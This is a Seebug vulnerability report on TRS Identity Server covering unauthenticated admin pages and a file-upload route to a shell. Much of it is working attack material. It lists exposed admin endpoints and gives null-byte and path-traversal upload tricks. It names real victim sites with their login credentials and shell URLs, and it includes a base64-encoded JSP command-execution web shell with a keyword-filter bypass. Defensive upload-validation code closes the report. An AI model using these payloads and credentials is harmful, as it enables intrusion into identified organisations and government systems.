TRS (拓尔思) system: a collection of authorization-bypass operations plus GETSHELL

2015-01-17T00:00:00
ID SSV:94697
Type seebug
Reporter Root
Modified 2015-01-17T00:00:00

Description

Summary:

Older versions and some customized (secondary-development) builds appear to be unaffected... There is no end to security!

Details:

Note: Copyright ©2004 - 2006 TRS is not affected; Copyright ©2004 - 2008 TRS is not affected; some customized builds are also not affected.

--------------------------------------

The authorization bypass allows viewing user information; in several of the cases below the user counts add up to over a million.

Product name: TRS Identity Server (IDS) single sign-on system
Vulnerability type: authorization bypass & arbitrary file upload (GETSHELL)
Vulnerable files, authorization bypass (I did not count how many endpoints there are; there are just that many):

/ids/admin/sys/system/editSysParaCfg.jsp - system parameter settings
/ids/admin/sys/system/editRegCfg.jsp - registration parameter settings (the receiving mailbox can be changed...)
/ids/admin/sys/system/editRealNameCfg.jsp - real-name authentication parameter settings (the upload path and upload type can be set)
/ids/admin/sys/system/editLoginCfg.jsp - user login parameter configuration
/ids/admin/sys/verifyCode/editVerifyCodeParaCfg.jsp - captcha parameter settings
/ids/admin/sys/navigation.jsp - system configuration
/ids/admin/notifycation/list.jsp - mail sending list
/ids/admin/notifycation/detailMessage.jsp?id=xxx - notification module (contains registration passwords in cleartext)
/ids/admin/user/list.jsp - user list (passwords can be reset)
/ids/admin/ldap/domain/config_dir.jsp - LDAP directory settings
/ids/admin/ad/domain/add.jsp - add domain information
/ids/admin/sys/database/viewDbInfoCfg.jsp - view database connection
/ids/admin/sys/http/edit.jsp - HTTP parameter settings
/ids/admin/sys/accessPermission/edit.jsp - access control global parameter settings
/ids/admin/sys/auth/editCACfg.jsp - certificate parameter settings
/ids/admin/sys/customfield/addColumn.jsp?boName=User - add attribute
/ids/admin/sys/customfield/list.jsp - attribute list
/ids/admin/sys/group/editGroupAttributesMapping.jsp - organization parameter settings
/ids/admin/sys/sso/edit.jsp - cross-domain single sign-on parameter settings
/ids/admin/sys/synchronize/synchronizationConfig.jsp - synchronization server parameter settings
http://idss.haier.net/ids/admin/sys/synchronize/listSynchronizer.jsp - synchronization server list
/ids/admin/coapp/viewUserSynchronization.jsp - user synchronization configuration of system [ids]
/ids/admin/archivelog/config.jsp - whether logs are archived

Arbitrary file upload: account/uploadAuthInfo.jsp. How it is exploited:

```java
if (this.realNameAuthenticationService.isApply(userName)) {
    // If the user has uploaded before: the file name is built from the user name,
    // so the file name is attacker-controlled and can be truncated (null byte)
    UserRealNameInfo uRealNameInfo = null;
    uRealNameInfo = this.realNameAuthenticationManager.find(userName);
    uploadFile = this.imageFileManager.find(uRealNameInfo.getUploadFileId());
    uploadFile.setNewFileName(userName + "." + fileType);
    uploadFile.setUploadTime(System.currentTimeMillis());
    uploadFile.setOriginalFileName(fileName);
    uploadFile.setFileSize(fileSize);
    uploadFile.setImageUrl(uploadPath);
    uploadFile.setType(type);
    this.imageFileManager.update(uploadFile);
    LOG.debug("update User realName authentication upload file success :" + uploadFile);
} else {
    // Same as above; the first upload takes this branch
    uploadFile.setNewFileName(userName + "." + fileType);
    uploadFile.setUploadTime(System.currentTimeMillis());
    uploadFile.setOriginalFileName(fileName);
    uploadFile.setFileSize(fileSize);
    uploadFile.setImageUrl(uploadPath);
    uploadFile.setNewFileName(DateUtil.timeMillisToString(System.currentTimeMillis(), "yyyyMM")
            + File.separator + uploadFile.getNewFileName());
    uploadFile.setType(type);
    this.imageFileManager.add(uploadFile);
    LOG.debug("add User realName authentication upload file success :" + uploadFile);
}
```

Because TRS uploads to the /WEB-INF/private/ directory by default, there are two ways to break out. One is to traverse via the file name, /../../../username.jsp%00.jpg, which creates the shell file under the /ids/ directory. The other is to configure the upload path through /ids/admin/sys/system/editRealNameCfg.jsp (real-name authentication parameter settings, where the upload path and upload type can be set); then only the file-name truncation username.jsp%00.jpg is needed, and the file is stored at /ids/<configured directory>/<current year-month>/<username>.jsp.

Example 1: http://idss.haier.net/ids/
Username/password: trsadmin1/trsadmin1. Shell address after upload: http://**.net/ids/account/201501/trsadmin1.jsp

![1.jpg](https://images.seebug.org/upload/201501/171532549f9a945d9182789bf22e64970d4de276.jpg)

Example 2: http://app.sdwr.gov.cn/ids/admin/login.jsp Username/password: trsadmin1/trsadmin1. Shell address: http://app.****.gov.cn/ids/trsadmin1.jsp

![1.jpg](https://images.seebug.org/upload/201501/1715354376eaf7d2d89013d6aec061bbdcd13609.jpg)

Example 3: http://ids.shjnet.cn/ids/admin/login.jsp Username/password: trsadmin1/trsadmin1. Shell address: http://ids.*.cn/ids/201501/trsadmin1.jsp

![1.jpg](https://images.seebug.org/upload/201501/171537277c949be92946e1102078bf66b9cb2c49.jpg)

Example 4: http://www.catr.cn/ids/ Username/password: trsadmin1/trsadmin1. Shell: http://www.****.cn/ids/trsadmin1.jsp

![1.jpg](https://images.seebug.org/upload/201501/171540270c323218ccb425187f248b29531431a7.jpg)

Example 5: http://www.hisense.com/ids/ Username/password: trsadmin1/trsadmin1. This one has filtering: the submitted input stream is inspected, and keywords such as exec and XXXputStream are all filtered out; a typical shell contains exactly these keywords. Here the shell can be written by using the FileUtil that trsids-server.jar itself provides: in the class com.trs.idm.util.FileUtil, these two functions are all we need:

```java
public static void createTxtFile(File f) {
    if (!f.exists()) {
        try {
            f.createNewFile();
        } catch (IOException e) {
            LOG.error("error while create new file: " + f, e);
        }
        LOG.debug(f + "已创建!");
    } else {
        LOG.debug(f + "已已存在!");
    }
}

public static void out(File f, String str) {
    out(f, str, "");
}

public static void out(File f, String str, String enc) {
    if (StringHelper.isEmpty(enc)) {
        enc = "UTF-8";
    }
    FileOutputStream fos = null;
    OutputStreamWriter out = null;
    BufferedWriter writer = null;
    try {
        // Opened in append mode: the string is appended to the target file
        fos = new FileOutputStream(f, true);
        out = new OutputStreamWriter(fos, enc);
        writer = new BufferedWriter(out);
        writer.write(str);
        writer.newLine();
        writer.flush();
        LOG.debug("write str: " + str + " to file: " + f);
    } catch (IOException e) {
        LOG.error("error while write string: " + str + " to file: " + f, e);
        try {
            if (writer != null) { writer.close(); writer = null; }
            if (out != null) { out.close(); out = null; }
        } catch (IOException e2) {
            LOG.error("error while close writer and out", e2);
        }
    } finally {
        try {
            if (writer != null) { writer.close(); writer = null; }
            if (out != null) { out.close(); out = null; }
        } catch (IOException e) {
            LOG.error("error while close writer and out", e);
        }
    }
}
```

Calling a utility class from a jar that is already present gets past the data-stream inspection and the getshell succeeds:

```jsp
<%@ page import="sun.misc.BASE64Decoder,java.io.*,java.util.*,com.trs.idm.util.FileUtil" contentType="text/html;charset=UTF-8"%>
<%-- imports FileUtil --%>
<%
    String str = "/TRS/TRSIDS3.5/webapps/ids/account/trsadmin11.jsp";
    File f = new File(str);
    FileUtil.createTxtFile(f);
    StringBuffer sb = new StringBuffer("");
    sb.append("PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+PCV0cnkge1N0cmluZyBjbWQgPSByZXF1ZXN0L");
    sb.append("mdldFBhcmFtZXRlcigiY21kIik7UHJvY2VzcyBjaGlsZCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV");
    sb.append("4ZWMoY21kKTtJbnB1dFN0cmVhbSBpbiA9IGNoaWxkLmdldElucHV0U3RyZWFtKCk7aW50IGM7d2hpbG");
    sb.append("UgKChjID0gaW4ucmVhZCgpKSAhPSAtMSkge291dC5wcmludCgoY2hhciljKTt9aW4uY2xvc2UoKTt0cn");
    sb.append("kge2NoaWxkLndhaXRGb3IoKTt9IGNhdGNoIChJbnRlcnJ1cHRlZEV4Y2VwdGlvbiBlKSB7ZS5wcmludFN");
    sb.append("0YWNrVHJhY2UoKTt9fSBjYXRjaCAoSU9FeGNlcHRpb24gZSkge1N5c3RlbS5lcnIucHJpbnRsbihlKTt9JT4=");
    String base64_str = new String((new BASE64Decoder()).decodeBuffer(sb.toString()));
    FileUtil.out(f, base64_str);
%>
```

Upload the file above, combined with the user-name truncation, then visit <username>.jsp; the shell file is created in the specified folder. Shell address: http://www.**.com/ids/account/trsadmin11.jsp?cmd=id

![1.jpg](https://images.seebug.org/upload/201501/1715492762826bd3d5e0e8b5d6623946ea746905.jpg)
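The upload code in uploadAuthInfo.jsp builds the stored name from the user name plus a caller-chosen type, and Example 5 shows that a keyword blacklist on the uploaded bytes does not help either. The following is an added example (not TRS code) of how a defender would name and validate that real-name upload instead; the baseDir, the extension allow-list and the magic-byte check are assumptions of this example, not TRS configuration:

```java
import java.io.IOException;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Added example for this advisory, not TRS code. Replaces the
// userName + "." + fileType naming in uploadAuthInfo.jsp. Assumes baseDir is
// outside the web root and the user-to-file link lives in the database.
public final class SafeRealNameUpload {
    // Allow-list of document types accepted for real-name authentication.
    private static final Set<String> ALLOWED_EXT = Set.of("jpg", "jpeg", "png");

    // JPEG and PNG magic bytes; a keyword blacklist on the content is not a substitute.
    private static final byte[] JPEG = {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF};
    private static final byte[] PNG = {(byte) 0x89, 'P', 'N', 'G'};

    /** True if the first bytes look like one of the accepted image formats. */
    public static boolean hasImageMagic(byte[] head) {
        return startsWith(head, JPEG) || startsWith(head, PNG);
    }

    private static boolean startsWith(byte[] data, byte[] magic) {
        return data != null && data.length >= magic.length
                && Arrays.equals(Arrays.copyOf(data, magic.length), magic);
    }

    /**
     * Chooses the on-disk path for an upload. The caller-supplied name is
     * validated but never copied into the path: the stored name is random and
     * the extension comes from the allow-list, so "user.jsp%00.jpg" (a NUL after
     * URL decoding) and "../../user.jsp" have nothing to truncate or traverse with.
     */
    public static Path resolveUploadPath(Path baseDir, String originalName, byte[] head) throws IOException {
        if (originalName == null || originalName.indexOf('\0') >= 0 || originalName.contains("/")
                || originalName.contains("\\") || originalName.contains("..")) {
            throw new IllegalArgumentException("rejected upload name");
        }
        int dot = originalName.lastIndexOf('.');
        String ext = dot < 0 ? "" : originalName.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) throw new IllegalArgumentException("extension not allowed: " + ext);
        if (!hasImageMagic(head)) throw new IllegalArgumentException("content is not an accepted image");
        Path base = baseDir.toRealPath();            // baseDir must already exist
        Path target = base.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(base)) throw new IOException("path escapes upload directory");
        return target;
    }
}
```

The admin-configurable upload path from editRealNameCfg.jsp should not feed baseDir at all; keep it a fixed, non-served directory and hand files back through a controller that sets a download Content-Type.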